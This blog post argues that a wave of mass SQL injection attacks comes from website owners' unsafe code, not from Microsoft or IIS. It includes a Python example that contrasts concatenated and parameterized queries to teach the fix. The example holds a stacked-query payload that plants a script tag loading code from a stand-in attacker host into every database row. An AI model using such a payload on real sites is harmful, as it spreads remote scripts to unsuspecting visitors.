My previous blog post attempted to explain SQL injection and why it's a problem. The current attacks have started to get media coverage, and the media is looking for a target (a scapegoat). So, as is often the case, someone gets wrongly blamed, and right now it's of course Microsoft.
It’s NOT Microsoft’s fault.
Here's what's happening: Microsoft recently announced a couple of new vulnerabilities, one of them in IIS. At the same time there's a barrage of SQL injection attacks being carried out, and the natural assumption is "OH, IT'S THOSE NEW VULNERABILITIES IN MICROSOFT". I guess they'll never live down Sasser and Nimda. So I'm sorry, but it's not Microsoft's fault; it's your code. Fix your code.
Then whose fault is it?
It's yours. You loaded unsafe code on your website and you didn't fix it. The attack doesn't exploit the web server or the database engine; it exploits pages that paste request input straight into SQL. Just restoring a backup of your database is not going to fix it: that removes the injected content, but the hole in the code is still there, you're still vulnerable, and the next pass of the attack will put it right back.
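To make that point concrete, here is an added example (my own illustration, not code from the original post or from any of the sites being attacked) of the bug and its fix. It uses Python's sqlite3 module with a constructed two-row "pages" table; the injected script URL is a made-up stand-in for the real one, and executescript() is used in the vulnerable lookup only to imitate drivers that accept a ';'-separated batch in one call, which is what the stacked-query payload relies on. The parameterized lookup is the fix: the same input arrives as a value, not as SQL text.

```python
import sqlite3

# Stand-in for the <script src=...> tag the attack appends to text columns.
# The real hostnames are not reproduced; this URL is a constructed placeholder.
INJECTED_TAG = '<script src="http://attacker.example/x.js"></script>'

# Stacked-query payload of the kind used: finish the SELECT, then append the
# tag to every row of a text column. Constructed for this example.
PAYLOAD = "1; UPDATE pages SET body = body || '" + INJECTED_TAG + "'"


def make_db():
    """Constructed sample content table; not data from the original post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "INSERT INTO pages (title, body) VALUES ('Home', 'Welcome');"
        "INSERT INTO pages (title, body) VALUES ('About', 'About us');"
    )
    return conn


def bodies(conn):
    """All page bodies in id order, so the side effect can be inspected."""
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]


def page_title_vulnerable(conn, page_id):
    """The bug the post is about: request input concatenated into the SQL text.

    executescript() is used deliberately so that a ';'-separated batch runs,
    imitating drivers (such as the ones the attacked ASP/SQL Server sites used)
    that accept several statements per call. The SELECT result is discarded;
    what matters is the side effect of the attacker's appended UPDATE.
    """
    conn.executescript("SELECT title FROM pages WHERE id = " + page_id + ";")
    conn.commit()


def page_title_safe(conn, page_id):
    """The fix: the input travels as a bound parameter, never as SQL text.

    Returns the matching titles. A payload string is compared as a value
    against the integer id column, matches nothing, and executes nothing.
    """
    cur = conn.execute("SELECT title FROM pages WHERE id = ?", (page_id,))
    return [row[0] for row in cur.fetchall()]


def infected_rows(conn):
    """Post-incident check: ids of rows carrying the injected tag.

    Restoring a backup empties this list but leaves page_title_vulnerable()
    in place, so the rows come back on the next pass; the code change is the fix.
    """
    cur = conn.execute(
        "SELECT id FROM pages WHERE body LIKE ? ORDER BY id",
        ("%" + INJECTED_TAG + "%",),
    )
    return [row[0] for row in cur.fetchall()]


if __name__ == "__main__":
    db = make_db()
    page_title_vulnerable(db, PAYLOAD)
    print("after vulnerable lookup, infected rows:", infected_rows(db))  # [1, 2]

    db = make_db()
    print("safe lookup with payload returns:", page_title_safe(db, PAYLOAD))  # []
    print("safe lookup with '1' returns:", page_title_safe(db, "1"))  # ['Home']
    print("after safe lookup, infected rows:", infected_rows(db))  # []
```

The same PAYLOAD string goes into both lookups. In the concatenated version it becomes two statements and every row ends up carrying the tag; in the parameterized version it is just a value that no id equals, while a legitimate "1" still finds the page. Nothing about IIS or the database product enters into it.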
Bill Staples has a blog post about SQL injection that references some good resources and also lays to rest the misconception that this is Microsoft's fault.
Patrick S also has a great blog article on the current attacks at msblog.org that shows the decoded SQL posted to sites and states that there are now 510,000 modified pages in Google as part of this same outbreak, all linking back to 3 common sites. Unfortunately, he attributes it to the IIS vulnerability, which it isn't.
Here's another nice blog post (although it's SQL injection, not "SQL infection") that talks about this current outbreak and references Jeremiah Grossman, CTO of WhiteHat Security, who was the individual that pointed out to me last year that every website is vulnerable in some fashion.
Finally, Bill Sisk also puts the whole thing to rest: it's not Microsoft's fault.
At any rate, this is a pretty nasty outbreak and I'd recommend you hit some of the resources linked to in my earlier SQL injection post.